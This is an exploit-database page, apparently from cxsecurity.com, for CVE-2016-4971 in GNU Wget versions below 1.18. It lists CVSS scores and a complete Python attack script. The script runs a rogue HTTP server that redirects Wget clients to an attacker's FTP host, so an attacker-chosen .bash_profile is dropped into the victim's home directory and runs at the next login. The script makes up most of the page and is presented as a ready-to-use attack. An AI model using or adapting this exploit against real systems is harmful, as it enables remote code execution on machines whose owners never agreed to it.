GNU wget Arbitrary File Upload / Code Execution

2021.04.30
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) # Original Exploit Author: Dawid Golunski # Exploit Author: liewehacksie # Version: GNU Wget < 1.18 # CVE: CVE-2016-4971 import http.server import socketserver import socket import sys class wgetExploit(http.server.SimpleHTTPRequestHandler): def do_GET(self): # This takes care of sending .wgetrc/.bash_profile/$file print("We have a volunteer requesting " + self.path + " by GET :)\n") if "Wget" not in self.headers.get('User-Agent'): print("But it's not a Wget :( \n") self.send_response(200) self.end_headers() self.wfile.write("Nothing to see here...") return self.send_response(301) print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n") new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE) print("Sending redirect to %s \n"%(new_path)) self.send_header('Location', new_path) self.end_headers() HTTP_LISTEN_IP = '192.168.72.2' HTTP_LISTEN_PORT = 80 FTP_HOST = '192.168.72.4' FTP_PORT = 2121 FILE = '.bash_profile' handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) print("Ready? Is your FTP server running?") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((FTP_HOST, FTP_PORT)) if result == 0: print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)) else: print("FTP is down :( Exiting.") exit(1) print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT) handler.serve_forever()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top